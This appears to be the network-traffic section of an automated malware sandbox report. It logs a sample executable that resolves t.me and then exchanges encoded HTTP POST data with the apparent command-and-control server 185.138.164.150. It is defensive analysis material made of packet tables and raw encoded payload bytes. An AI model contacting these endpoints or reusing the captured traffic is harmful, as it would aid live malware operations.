Sep 28, 2021 08:53:39.152461052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.152532101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.152540922 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.156650066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156673908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156775951 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156775951 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.156800032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156821012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156831026 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.156841993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156863928 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.156867027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156889915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.156907082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.159310102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.159333944 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.159354925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.159378052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.159395933 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.159468889 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.163827896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163845062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163873911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163928032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163945913 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.163961887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163978100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.163984060 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.164032936 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166251898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166270971 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166282892 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166316032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166371107 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166433096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166450024 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166481018 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166507959 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166538000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166541100 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166562080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166577101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166591883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166606903 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166635990 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166651011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166659117 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166675091 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166696072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166718006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166728973 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166755915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166774988 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166788101 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166805029 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166820049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166872978 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.166882992 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166906118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166927099 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166949987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166969061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166990042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.166992903 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.167006969 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.167015076 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.167022943 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.167077065 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.167097092 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.187283039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.187321901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.187347889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.187375069 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.187407970 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.187457085 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.191772938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191821098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191860914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191896915 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.191900015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191937923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191942930 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.191977978 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.191998959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.192018986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.192131996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.194463015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.194520950 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.194545984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.194576979 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.194577932 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.194639921 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.199315071 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199353933 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199410915 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.199809074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199853897 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199881077 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.199904919 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199951887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.199971914 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.201102972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201138020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201155901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201248884 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201262951 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.201366901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201394081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201461077 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.201482058 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201522112 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201554060 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.201917887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201946974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201966047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201988935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.201998949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202013016 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202027082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202073097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202111959 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202120066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202162027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202203989 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202218056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202258110 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202285051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202287912 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202310085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202346087 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202362061 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202368975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202404976 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202424049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202449083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202486038 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202543020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202567101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202590942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202605009 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202615023 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202637911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202661991 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.202666998 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.202699900 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.222794056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.222845078 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.222870111 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.222882986 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.222893000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.223016977 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.227585077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227658033 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227672100 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.227711916 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227770090 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.227780104 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227832079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227883101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227885008 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.227931976 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.227987051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.228032112 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.229322910 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.229367971 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.229403019 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.229435921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.229440928 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.229501009 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.234458923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234509945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234563112 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.234565973 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234635115 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.234679937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234719038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234755993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.234769106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.236299038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.236355066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.236396074 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:39.236505985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:39.236567020 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.198458910 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.198555946 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.233464956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.233490944 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.233500957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.233511925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.233654022 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.234066010 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.234167099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.234426975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.234536886 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.268857956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.268893957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.268910885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.269138098 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:40.269319057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.269671917 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.269857883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.269999027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.270123959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.270456076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.270736933 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.304286957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.304326057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.305191994 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.305216074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.305237055 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.766328096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:40.814460039 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:43.524956942 CEST	49744	80	192.168.2.3	185.138.164.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:53:33.622919083 CEST	57459	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:53:33.641828060 CEST	53	57459	8.8.8.8	192.168.2.3
Sep 28, 2021 08:53:51.131891012 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:53:51.162126064 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 28, 2021 08:53:55.541701078 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:53:55.563695908 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:13.777872086 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:13.829201937 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:14.437585115 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:14.502115011 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:14.965698004 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:14.990356922 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:15.329873085 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:15.347162962 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:15.550899982 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:15.578679085 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:15.808408976 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:15.827999115 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:16.250245094 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:16.269861937 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:16.333332062 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:16.360676050 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:16.800725937 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:16.824779034 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:17.523451090 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:17.557389021 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:18.520324945 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:18.524641991 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:18.539841890 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:18.544071913 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:19.577667952 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:19.598947048 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:21.797107935 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:21.824615955 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:31.358716011 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:31.381870985 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 28, 2021 08:54:46.831329107 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:54:46.850263119 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 28, 2021 08:55:03.862735987 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:55:03.882612944 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 28, 2021 08:55:19.708309889 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:55:19.743192911 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 28, 2021 08:55:28.945382118 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 28, 2021 08:55:28.965115070 CEST	53	50728	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 08:53:33.622919083 CEST	192.168.2.3	8.8.8.8	0x2a23	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 08:53:33.641828060 CEST	8.8.8.8	192.168.2.3	0x2a23	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

185.138.164.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	149.154.167.99	443	C:\Users\user\Desktop\eLZzxG56uH.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49744	185.138.164.150	80	C:\Users\user\Desktop\eLZzxG56uH.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:53:34.173084974 CEST	1009	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.138.164.150
Sep 28, 2021 08:53:34.173703909 CEST	1009	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 59 30 68 44 75 74 57 46 46 71 71 6f 73 36 45 38 73 35 38 67 42 53 75 46 57 6c 4c 30 6b 38 Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3Y0hDutWFFqqos6E8s58gBSuFWlL0k8Q2o9Z+g4SA6mUfPioO+bRs7PwMPA1eTYjDT+XAhR/Atg==
Sep 28, 2021 08:53:34.697535992 CEST	1010	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 06:53:34 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 31 37 31 34 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 63 57 38 64 58 4f 73 35 34 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 37 4d 55 57 6b 77 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 59 63 72 75 72 57 50 71 53 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 65 77 4b 31 34 6f 67 39 6f 34 49 75 67 49 47 46 35 57 6f 66 50 69 70 61 2b 37 6c 6d 75 61 78 58 5a 41 6f 50 48 39 32 54 57 37 71 65 31 6c 58 4f 37 4d 55 4e 43 76 6e 78 52 37 30 51 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 54 4e 37 47 50 6b 68 78 2b 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 45 67 54 55 62 32 6c 6b 34 54 75 5a 33 49 64 35 4a 4e 4a 41 6c 53 5a 67 32 4d 59 31 54 67 7a 31 68 34 59 30 6d 67 32 68 37 45 74 49 74 4d 2b 77 76 50 64 32 4f 36 54 6a 41 31 33 45 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 71 79 2f 35 72 49 35 4d 68 77 48 69 4a 7a 58 4d 6f 58 6a 31 6a 62 76 78 4c 64 61 6c 76 50 66 66 58 48 67 67 5a 44 50 72 34 6c 66 45 6f 45 61 6a 79 43 73 47 53 73 71 37 4a 4e 78 59 55 65 4c 79 59 43 37 69 45 57 6f 79 46 6b 37 6b 51 4a 71 33 73 63 54 55 6a 6b 65 34 68 59 47 35 70 6b 41 6e 75 72 76 58 54 56 75 6b 46 31 69 4a 63 41 78 52 34 39 51 6d 73 36 6e 51 65 67 75 56 30 53 69 54 6d 49 33 64 33 69 65 66 51 70 41 73 54 61 51 53 68 6d 2b 42 39 4f 46 38 6e 6a 43 4a 2b 41 77 43 56 6d 4e 6a 31 56 34 55 59 6e 44 73 52 2f 64 39 78 54 57 35 74 69 50 66 79 67 37 35 6f 44 7a 32 4f 71 7a 70 61 50 65 53 73 4d 30 6d 65 43 30 4e 48 65 77 41 4d 34 63 66 7a 4c 2b 66 57 54 39 6f 4d 4c 79 42 37 65 52 4b 69 53 64 69 31 78 73 50 4f 5a 4c 7a 32 63 4b 6c 78 64 6a 4b 79 6c 6d 4e 36 48 51 38 33 73 51 70 49 43 41 61 61 51 77 74 6a 4e 77 7a 61 46 62 38 68 5a 78 52 53 79 58 38 7a 55 6b 76 6f 2f 7a 68 51 32 47 30 6a 42 72 6e 70 2b 34 63 65 34 48 41 41 31 34 6b 44 78 64 6a 4a 71 2f 30 76 53 39 58 77 48 51 6a 6b 6e 30 63 4a 2f 34 36 45 73 54 2f 7a 46 79 6d 36 73 78 31 33 65 72 4c 51 4d 78 59 73 7a 76 57 62 76 57 65 49 49 57 74 78 76 61 53 52 47 48 36 56 61 70 35 4a 34 7a 33 79 56 55 67 6d 6e 6c 58 69 6a 38 73 39 4d 66 4c 67 78 39 41 38 46 79 7a 43 44 72 79 4d 7a 63 63 6d 43 4d 59 6c 30 70 48 4b 66 63 57 4d 30 50 6e 38 38 72 58 68 7a 36 4a 42 4c 2f 41 35 4a 4f 51 2f 74 38 56 33 35 65 78 70 78 6b 75 42 2b 4e 64 36 4f 62 62 45 68 35 7a 6b 49 57 68 5a 63 53 6a 34 4f 53 51 6d 38 2b 55 4f 4b 49 4a 59 45 75 75 2b 6d 4a 6f 78 71 47 4b 73 36 2f 79 78 36 71 2f 76 43 38 77 44 77 38 55 62 65 55 58 35 74 58 6a 4c 31 65 79 78 33 38 42 31 4e 30 6f 65 37 31 68 46 59 61 58 36 72 50 63 4a 44 34 39 75 79 47 72 63 6b 53 6b 57 2b 55 31 4c 67 56 4b 39 5a 2f 69 57 45 45 50 31 6c 68 5a 62 44 6e 38 76 4f 76 6c 79 4c 6d 4d 36 6e 31 78 63 58 70 75 4a 69 73 79 72 2b 78 6b 46 6f 5a 74 6e 77 4f 68 59 36 6f 2f 37 34 33 66 41 51 76 6a 4e 6b 6b 56 76 50 76 47 43 4d 7a 42 69 51 67 6b 47 45 6c 6d 62 6b 2b 42 71 59 49 73 33 6b 39 6e 6d 6c 59 74 63 74 34 39 2b 79 74 6c 33 6b 4c 39 6c 33 4f 6a 39 7a 44 49 63 35 73 38 65 4e 64 33 34 56 56 4d 67 2b 6e 5a 75 56 52 4d 74 73 69 45 63 6d 79 6c 36 71 78 76 65 61 47 34 51 